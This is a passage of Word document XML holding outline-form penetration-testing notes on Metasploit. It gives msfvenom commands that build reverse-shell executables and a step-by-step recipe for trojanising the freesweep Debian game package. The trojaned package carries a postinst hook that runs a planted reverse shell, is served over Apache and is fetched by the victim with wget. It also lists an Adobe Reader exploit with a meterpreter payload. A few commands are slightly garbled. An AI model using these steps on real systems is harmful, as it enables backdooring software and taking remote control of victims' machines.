    <w:p w14:paraId="735C953A" w14:textId="28BD613A" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Generate an executable from a Metasploit payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0447B6FB" w14:textId="4FB3FC6B" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>useful in social engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E77ED2" w14:textId="68F63851" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>generate reverse shell payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DB7136" w14:textId="0E76E281" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfvenom - -payload-options -p windows/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DC2B42" w14:textId="0F7F8F52" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B21F2A">
        <w:t>msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA9FDFA" w14:textId="6D98BB39" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use multi/handler to handle exploits launched from outside the framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17537BEF" w14:textId="419A7A3C" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfconsole -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E50175A" w14:textId="336F401E" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFB89C0" w14:textId="15590347" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DF7551" w14:textId="0695B123" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>set payload windows/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B945B6" w14:textId="4A1CAAC5" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D015B7" w14:textId="1B25D6FB" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B51927" w14:textId="6994ED3D" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Binary Linux Trojan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115E3234" w14:textId="62B708D1" w:rsidR="00B21F2A" w:rsidRDefault="0005276B" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00B21F2A" w:rsidRPr="004C2B86">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://securitytube.net/Ubuntu-Package-Backdoor-using-a-Metasploit-Payload-video.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3866295B" w14:textId="30A88985" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>freesweep package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB088A9" w14:textId="76664CA2" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>apt-get - -download-only install freesweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D96D305" w14:textId="7D339732" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>mkdir /tmp/evil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3C5060" w14:textId="79DA3B03" w:rsidR="00B21F2A" w:rsidRDefault="00B21F2A" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4416ED02" w14:textId="7CC51728" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00B21F2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cd /tmp/evil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30164CFF" w14:textId="62395AB9" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>extract package to working directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A5E26" w14:textId="5EB37E77" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>dpkg -x freesweep_0.90-1_i386.deb work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27078DA6" w14:textId="3541CB44" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>mkdir work/DEBIAN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381FC220" w14:textId="0FB60FE6" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>create file “control”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568CA632" w14:textId="5F4BBB3F" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cat the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE25240" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Package: freesweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A4D12" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Version: 0.90-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEB9411" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Section: Games and Amusement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C1290" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Priority: optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B80F59B" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Architecture: i386</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5B063D" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B1E36" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Description: a text-based minesweeper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D92E579" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Freesweep is an implementation of the popular minesweeper game, where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5779FCFE" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> one tries to find all the mines without igniting any, based on hints given</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB724A" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> by the computer. Unlike most implementations of this game, Freesweep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8C6ECD" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> works in any visual text display - in Linux console, in an xterm, and in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775B5A04" w14:textId="4DC317B2" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> most text-based terminals currently in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070E972" w14:textId="2D6ACE65" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>in DEBIAN directory, create a file named postinst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5665806F" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFD0EE6" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757CD6A6" w14:textId="06BAF485" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sudo chmod 2755 /usr/games/freesweep_scores &amp;&amp; /usr/games/freesweep_scores &amp; /usr/games/freesweep &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D434B1D" w14:textId="35B9E24F" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>create malicious payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372BC54B" w14:textId="5F0ABE18" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22447">
        <w:t>msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B7BC8" w14:textId="37857DD0" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>make executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1738662A" w14:textId="211760F9" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>chmod 755 postinst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F003DB" w14:textId="7E4A67A3" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>dpkg-deb - -build /tmp/evil/work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0776D56C" w14:textId="4C64680A" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>mv work.deb freeswap.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F81D93" w14:textId="02C494F4" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>cp freesweep.deb /var/www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A93166D" w14:textId="0B9D52F5" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>start Apache web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D844591" w14:textId="0DFDD742" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E37CA81" w14:textId="0B1FCC82" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>setup multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1784AC76" w14:textId="77777777" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfconsole -q -x "use exploit/multi/handler;set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST 192.168.1.101; set LPORT 443; run; exit -y"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF55065" w14:textId="628702CE" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>On Victim Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708390A5" w14:textId="27D03D76" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C22447">
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="004C2B86">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;attacker</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> ip&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22447">
        <w:t>/freesweep.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD28EF0" w14:textId="73AEEC82" w:rsidR="00C22447" w:rsidRDefault="00C22447" w:rsidP="00C22447">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sudo dpkg -i freesweep.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B41D6E" w14:textId="017EEC01" w:rsidR="00453967" w:rsidRDefault="00453967" w:rsidP="00453967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Will receive shell on attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D308BA5" w14:textId="6540FBF4" w:rsidR="00453967" w:rsidRDefault="001625BE" w:rsidP="00453967">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Client-Side Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090EAEC3" w14:textId="55BA28AD" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>social engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B75A86" w14:textId="6C04F2FD" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EACD72" w14:textId="23DCBFC8" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Adobe Reader ‘util.printf()’ Javascript Function Stack Buffer Overflow Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B617E6" w14:textId="3A663230" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/windows/fileformat/adobe_utilprintf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA01C52" w14:textId="5B258284" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set FILENAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490CD81F" w14:textId="3FA42116" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1696169F" w14:textId="25AEEE92" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43031754" w14:textId="0C2B328D" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703EF854" w14:textId="3F0543EE" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480BD1B5" w14:textId="20DAC1BB" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0346E46D" w14:textId="31E8AD12" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>copy .pdf output into /tmp directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46445724" w14:textId="405830BF" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>setup listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1252F8BD" w14:textId="3428CA4B" w:rsidR="001625BE" w:rsidRDefault="001625BE" w:rsidP="001625BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
